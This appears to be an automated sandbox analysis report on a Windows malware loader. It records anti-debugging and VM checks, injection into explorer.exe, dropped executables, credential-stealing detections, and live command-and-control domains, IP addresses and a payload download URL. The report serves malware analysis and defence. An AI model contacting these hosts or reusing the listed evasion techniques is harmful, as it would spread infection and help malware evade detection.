    Source: explorer.exe, 00000001.00000000.1806362618.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1809487510.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 00000001.00000000.1809487510.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
    Source: explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000001.00000000.1809487510.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000001.00000000.1808911051.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D80D90 mov eax, dword ptr fs:[00000030h]0_2_02D80D90
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D8092B mov eax, dword ptr fs:[00000030h]0_2_02D8092B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02DBA70B push dword ptr fs:[00000030h]0_2_02DBA70B
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02CC0D90 mov eax, dword ptr fs:[00000030h]5_2_02CC0D90
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02CC092B mov eax, dword ptr fs:[00000030h]5_2_02CC092B
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02D59DF3 push dword ptr fs:[00000030h]5_2_02D59DF3
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF0D90 mov eax, dword ptr fs:[00000030h]6_2_02BF0D90
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF092B mov eax, dword ptr fs:[00000030h]6_2_02BF092B
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02C6A049 push dword ptr fs:[00000030h]6_2_02C6A049
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_02C39E19 push dword ptr fs:[00000030h]8_2_02C39E19
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_02E80D90 mov eax, dword ptr fs:[00000030h]8_2_02E80D90
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_02E8092B mov eax, dword ptr fs:[00000030h]8_2_02E8092B

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: fgbwcit.1.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 190.147.128.172 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 8C419A8Jump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitThread created: unknown EIP: 9A619A8Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeThread created: unknown EIP: 9B41970Jump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitThread created: unknown EIP: 9091970Jump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806215817.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 9_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_00404E64
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B60 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,0_2_00415B60

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    32
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    12
    Virtualization/Sandbox Evasion
    LSASS Memory521
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection
    Security Account Manager12
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories
    NTDS3
    Process Discovery
    Distributed Component Object ModelInput Capture115
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync14
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532238 Sample: file.exe Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 39 nwgrus.ru 2->39 41 ninjahallnews.com 2->41 43 fallhandbat.com 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 6 other signatures 2->51 8 file.exe 2->8         started        11 trbwcit 2->11         started        13 fgbwcit 2->13         started        15 2 other processes 2->15 signatures3 process4 signatures5 69 Detected unpacking (changes PE section rights) 8->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->71 73 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->73 17 explorer.exe 58 6 8->17 injected 75 Multi AV Scanner detection for dropped file 11->75 77 Machine Learning detection for dropped file 11->77 79 Maps a DLL or memory area into another process 11->79 81 Checks if the current machine is a virtual machine (disk enumeration) 13->81 83 Creates a thread in another existing process (thread injection) 13->83 85 Switches to a custom stack to bypass stack traces 13->85 process6 dnsIp7 33 nwgrus.ru 190.147.128.172, 49738, 49739, 49740 TelmexColombiaSACO Colombia 17->33 35 23.145.40.164, 443, 49779 SURFAIRWIRELESS-IN-01US Reserved 17->35 37 175.119.10.231, 50047, 50048, 50049 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->37 25 C:\Users\user\AppData\Roaming\trbwcit, PE32 17->25 dropped 27 C:\Users\user\AppData\Roaming\fgbwcit, PE32 17->27 dropped 29 C:\Users\user\AppData\Local\Temp\565.exe, PE32 17->29 dropped 31 C:\Users\user\...\trbwcit:Zone.Identifier, ASCII 17->31 dropped 53 System process connects to network (likely due to code injection or exploit) 17->53 55 Benign windows process drops PE files 17->55 57 Deletes itself after installation 17->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->59 22 565.exe 17->22         started        file8 signatures9 process10 signatures11 61 Detected unpacking (changes PE section rights) 22->61 63 Machine Learning detection for dropped file 22->63 65 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 22->65 67 4 other signatures 22->67

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe37%ReversingLabs
    file.exe40%VirustotalBrowse
    file.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\fgbwcit100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\trbwcit100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\565.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\trbwcit37%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    nwgrus.ru12%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
    https://word.office.com0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
    https://aka.ms/odirmr0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
    https://api.msn.com/q0%VirustotalBrowse
    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
    https://ninjahallnews.com/search.php0%VirustotalBrowse
    http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
    https://wns.windows.com/L0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
    https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
    https://fallhandbat.com/search.php0%VirustotalBrowse
    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
    https://aka.ms/Vh5j3k0%VirustotalBrowse
    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%VirustotalBrowse
    https://www.msn.com:443/en-us/feed0%VirustotalBrowse
    https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    nwgrus.ru
    190.147.128.172
    truetrueunknown
    fallhandbat.com
    unknown
    unknowntrue
      unknown
      ninjahallnews.com
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://23.145.40.164/ksa9104.exetrueunknown
        https://ninjahallnews.com/search.phptrueunknown
        https://fallhandbat.com/search.phptrueunknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          unknown
          https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://excel.office.comexplorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.microexplorer.exe, 00000001.00000000.1809694826.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808417932.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1807989575.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://api.msn.com/qexplorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1811007850.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1811007850.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1811007850.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://word.office.comexplorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.msn.com/explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://outlook.com_explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      190.147.128.172
                                      nwgrus.ruColombia
                                      10620TelmexColombiaSACOtrue
                                      23.145.40.164
                                      unknownReserved
                                      22631SURFAIRWIRELESS-IN-01UStrue
                                      175.119.10.231
                                      unknownKorea Republic of
                                      9318SKB-ASSKBroadbandCoLtdKRtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1532238
                                      Start date and time:2024-10-12 22:27:07 +02:00
                                      Joe Sandbox product:CloudBasic
